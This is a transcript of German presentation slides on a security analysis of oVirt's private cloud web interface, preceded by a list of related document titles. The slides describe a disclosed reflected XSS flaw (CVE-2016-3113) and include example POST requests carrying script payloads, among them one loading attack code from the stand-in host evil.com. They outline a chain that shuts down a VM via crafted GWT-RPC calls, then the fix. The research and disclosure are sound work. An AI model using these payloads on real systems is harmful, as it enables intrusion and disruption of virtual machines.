Sicherheitsanalyse der Private Cloud Interfaces von

Ähnliche Dokumente
Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

When your browser turns against you Stealing local files

Aktuelle Sicherheitsprobleme im Internet: Angriffe auf Web-Applikationen

Sicheres Hosting in der Cloud. Dr. Christopher Kunz filoo GmbH

Rechnernetze Übung 12

Money for Nothing... and Bits4free

Web APIs auf dem Prüfstand Volle Kontrolle oder fertig mit den Azure Mobile Services?

Kroll Ontrack RDR Services

TimeMachine. Installation und Konfiguration. Version 1.4. Stand Dokument: install.odt. Berger EDV Service Tulbeckstr.

Secure Coding & Live Hacking von Webapplikationen. Conect Informunity

Fernwartung mit TeamViewer

Open Source Virtualisierung mit ovirt. DI (FH) René Koch

Konzept eines Datenbankprototypen Folie 1 Daniel Gander / Gerhard Schrotter

Virtuelle Entwicklungsarbeitsplätze und Linux

Anleitung hr Remote Access

Web Exploit Toolkits - Moderne Infektionsroutinen -

owncloud Sync Meine Daten gehören mir! Dr. Markus Tauber, AIT, ICB

Netzwerksicherheit Übung 9 Websicherheit

Webentwicklung mit Vaadin 7. Theoretische und praktische Einführung in Vaadin 7. Christian Dresen, Michael Gerdes, Sergej Schumilo

RTG Online Reporting. Anleitung. RTG Trading Solutions

Aktuelle Bedrohungen im Internet

Microsoft Azure für Java Entwickler

Platform as a Service (PaaS) Prof. Dr. Ch. Reich

Von 0 zur Private Cloud in 1h

Quickstart Guide. azeti SONARPLEX VAA Fehler erkennen, bevor Fehler entstehen

A9: Mobile Security - So werden Sie angegriffen! Renato Ettisberger renato.ettisberger@switch.ch

Destructive AJAX. Stefan Proksch Christoph Kirchmayr

Handbuch: PlagScan PlugIn in Moodle 2.X und 3.X für den Administrator

Sicherheit Web basierter Anwendungen

Sicherheit wird messbar Lösungsansätze und Methoden. Case. 15. September 2009, Hotel St. Gotthard, Zürich

System Center 2012 R2 und Microsoft Azure. Marc Grote

Hacking-Lab Online Hack&Learn 9. December 2008

Lehrveranstaltung Grundlagen von Datenbanken

HOSTED SHAREPOINT. Skyfillers Kundenhandbuch. Generell Online Zugang SharePoint Seite... 2 Benutzerpasswort ändern... 2

SSL VPN Zugang Anleitung Version 1.3

Archive / Backup System für OpenVMS

Virtuelle Umgebungen mit Powershell verwalten Azure und der Rest der Virtualisierung. Holger Voges

System Center 2012 R2 und Microsoft Azure. Marc Grote

VIVIT TQA Treffen in Köln am API- Programmierung und Nutzung bei HP Quality Center / ALM. Michael Oestereich IT Consultant QA

Anwendungsprotokolle: HTTP, POP, SMTP

Sicherer Datenaustausch zwischen der MPC-Group und anderen Firmen. Möglichkeiten zum Datenaustausch... 2

Keine Kompromisse bei der Performance in der Cloud! Christian Lorentz, Product Marketing Manager

OP-LOG

Web Hacking - Angriffe und Abwehr

Live Hacking auf eine Citrix Umgebung

RDS und Azure RemoteApp

Aktuelle Sicherheitsprobleme im Internet

Check Point IPS. Agenda. Check Point & AlgoSec Security-Update 24./25. September «Eine Firewall ohne IPS ist keine Firewall»

Die Cargo Plattform bietet einen sicheren und einfachen Datentransfer mit einem modernen Web- Interface.

JobServer Installationsanleitung

Security. Stefan Dahler. 6. Zone Defense. 6.1 Einleitung

Technische Anforderungen. zum Empfang. von XML-Nachrichten

Windows Azure für Java Architekten. Holger Sirtl Microsoft Deutschland GmbH

Sicherheitsanalyse von Private Clouds

Entwicklungstand der GUI

Trend Micro Virtualisierte Rechenzentren absichern mit Deep Security

McAfee Advanced Threat Defense 3.0

Microsoft Azure Services-Plattform

Dr. Norbert Schirmer!"#$ 11. Mai 2011 Bonn

Revit Modelle in der Cloud: Autodesk 360 Mobile

Sicherheit von Webapplikationen Sichere Web-Anwendungen

Schwachstellenanalyse 2013

TimeMachine. Time CGI. Version 1.5. Stand Dokument: time.odt. Berger EDV Service Tulbeckstr München

Anleitung hr Remote Access

die derzeit wohl spezialisierteste Software für den Bereich des effektivitäts-orientierten EPM

Virtual Desktop Infrasstructure - VDI

Websockets: Leichtgewichtige Verbindungen für Web-Applikationen

Einführung in Web-Security

E rk e n n u n g s c h ä dlic h e r We b s e it e n. Armin Büscher, Malware G Data Security Labs

Verschlüsselt und versperrt sicheres mobiles Arbeiten Mario Winter

bnsyncservice Installation und Konfiguration bnnetserverdienst Voraussetzungen: KWP Informationssysteme GmbH Technische Dokumentation

oder von 0 zu IaaS mit Windows Server, Hyper-V, Virtual Machine Manager und Azure Pack

Fachbereich Medienproduktion

Aktuelle Angriffstechniken auf Web-Applikationen. Andreas Kurtz cirosec GmbH, Heilbronn

Paper: Automated Discovery of Parameter Pollution Vulnerabilities in Web Applications

How to install freesshd

Hacker-Methoden in der IT- Sicherheitsausbildung. Dr. Martin Mink

Was eine WAF (nicht) kann. Ausgabe 2013

EXPOSÉ Software für Immobilienprofis!

Compass E-Lab Remote Security Lab 19. November Hacking-Lab Glärnischstrasse 7 Postfach 1671 CH-8640 Rapperswil

Übungsblatt 2: Kommunikation und XSS

SaaS Exchange Handbuch

IPCOP OPENVPN TUTORIAL

NovaBACKUP DataCenter 5.0. Screenshots

Fernwartung von Mac OS 9 u. X per VNC

XSS for fun and profit

Servervirtualisierung mit Xen Möglichkeiten der Netzwerkkonfiguration

Dieses Dokument beschreibt die Anwendung des Repa Copy Token.

Aufbau eigener Cloud-Infrastrukturen mit Eucalyptus Hochschule Mannheim

OFS: Ein allgemeines Offline-Dateisystem auf Basis von FUSE

Installationsanleitung für. SugarCRM Open Source. Windows Einzelplatz

Cloud Computing: Wieviel IT braucht Schule und worauf kommt es an?

Die Herausforderungen in der Logfileanalyse zur Angriffserkennung

Mambo - mit Joomla! Das Open Source-CMS einsetzen und erweitern. von Tobias Hauser, Christian Wenz. 1. Auflage. Hanser München 2005

SIMLUX: Virtualisierung. Simply Managed Linux

Transkript:

Sicherheitsanalyse der Private Cloud Interfaces von Emanuel Durmaz Ruhr-Universität Bochum 1

Emanuel Durmaz 10/16: Bachelor of Science IT-Sicherheit, Ruhr-Universität Bochum Thesis: Sicherheitsanalyse der Private Cloud Interfaces von ovirt Seit 10/16: Master-Student IT-Sicherheit, Ruhr-Universität Bochum Seit 06/16: Werkstudent G DATA Software AG Entwickler im Team zur automatischen Malware-Analyse 2

IaaS Cloud Infrastruktur- und Virtualisierungsmanagement-Plattform Open-Source Projekt von Upstream-Projekt der RedHat Virtualization Cloud-Lösung Im Private Cloud Szenario eingesetzt Webinterface mit Benutzerverwaltung Basiert auf Google Webtoolkit Nutzer: Brussels Airport Company, Florida State University RCC, Keele University, Universidad de Sevilla, etc. 3

Private IaaS Cloud: Angreifermodell Externer Angreifer Netzwerkperimeter Opfer bzw. Benutzer Webinterface Interner Angreifer Nodes VMs Cloud-Management- Platform Storage 4

VM-Zugriff novnc-html5-client via WebSocket RDP für Windows VM s Virt-Viewer (Systemclient) zum Aufbau der VNC-Verbindung Download einer Konfigurationsdatei für virt-viewer wird clientseitig erstellt, hochgeladen und reflektiert (Download) POST /ovirt-engine/services/attachment/console.vv contenttype=application%2fx-virt-viewer%3b+charset%3dutf-8 &content=[...konfigurationsdatei...] &encodingtype=plain 5

Reflected Cross-Site-Scripting Content-Type: text/html; charset=utf-8 HTML wird gerendert POST /ovirt-engine/services/attachment/console.vv contenttype=text%2fhtml%3b+charset%3dutf-8 &content=%3cscript%3ealert%281%29%3b%3c%2fscript%3e &encodingtype=plain GET-Methode wird nicht zugelassen (mit QueryString) Stattdessen: Ausführen mit selbstabschickendem POST-Formular <script src="http://evil.com/attack.js"></script> als Wert für das content-feld 6

Remote Procedure Calls RPC-Anfrage (Ausschnitt): VM Starten (Aktion)...org.ovirt.engine.core.common.action.RunVmParams~I42~"1~n~Z1~"1~o~Z0~"1~p~V~"1~q~V~"1~r ~V~"1~s~D0~"1~t~V~"1~u~V~"1~v~V~"1~w~V~"1~A~V~"1~B~V~"1~C~V~"1~D~Z1~"1~F~V~"1~G~V ~"1~H~V~"1~I~V~"1~J~V~"1~K~V~"1~L~V~"1~M~V~"1~N~Lorg.ovirt.engine.core.compat.Guid~I1~"1 ~b~!java.util.uuid~i2~j-4990809666594738282~j-4353420362383997589~i0~"1~o~v~"1~p~e... UUID (128 Bit): c3958b3e-ee26-456b-babd-150cf908ef96 (Aufteilen in 2x 64 Bit, Zweierkomplement) RPC-Anfrage: VMs Host Events... auflisten (Infos) R7~"61~org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWTService~"8~runQuery~D2~"3~uUj~ "3~U3g~Eorg.ovirt.engine.core.common.queries.VdcQueryType~I204~Lorg.ovirt.engine.core.commo n.queries.searchparameters~i9~"1~b~d100~"1~c~" 4 5 7...~Vms: Host: Events:...~"1~d~Eorg.ovirt.engine.core.common.interfaces.SearchType~I0~"1 ~e~z1~"1~f~j0~"1~n~v~"1~o~z0~"1~p~z0~"1~q~v~ 7

Angriff Webinterface Link wird geöffnet attack.js Selfsubmitting form 2. Validen GWT-Permutation Token aus.nocache.js Datei durch Ausprobieren ermitteln 3. Verstecktes iframe lädt Webportal, DOM-Zugriff und ermittelt UUID einer VM 4. UUID umwandeln und in konstruierte RPC-Anfrage einsetzen POST /ovirt-engine/services/attachment/console.vv contenttype=text/html&content=<script src= https://evil.com/attack.js ></script> <script src= https://evil.com/attack.js ></script> 1. GWT-RPC Anfrage: getnewxsrftoken Teste GWT-Permutation Token RPC-Anfrage: Stop VM with UUID XYZ XsrfToken 500 Server Error oder 200 OK UUID Reflektiert Wert von content mit text/html als Content-Type Fährt VM herunter ovirt-engine Node VM 8

Gegenmaßnahmen Reaktion seitens ovirt Entwickler: Validierung des contenttype-parameters mit Regex behebt XSS-Lücke: ^application/(x-virt-viewer rdp)(;.*)?$ Reflected Upload nach wie vor möglich Clientseitige Prävention XSS-Filter aktivieren bzw. installieren (z.b. NoScript Add-on für Firefox, in Chrome bereits integriert) Nie Links von Unbekannten öffnen, selbst wenn das Ziel nur im privaten / eigenem Netz erreichbar ist. 9

Fazit & Zusammenfassung Das Webinterface wurde auch bzgl. SQL-Injections, XSRF, Datei- Uploads, Authentifizierung untersucht keine Sicherheitslücken gefunden Resultierte Sicherheitslücke bzgl. VM-Zugriff wurde gemeldet und behoben: CVE-2016-3113 ovirt-engine: Reflected XSS (ovirt 3.6.5, April 16) Private Clouds können genauso von Angriffen betroffen sein wie Public Clouds 10

Danke! Fragen? Emanuel Durmaz Ruhr-Universität Bochum E-Mail: emanuel.durmaz@rub.de Sicherheitsanalyse der Private Cloud Interfaces von ovirt 11

2026 © DocPlayer.org Datenschutzbestimmungen | Nutzungsbedingungen | Feedback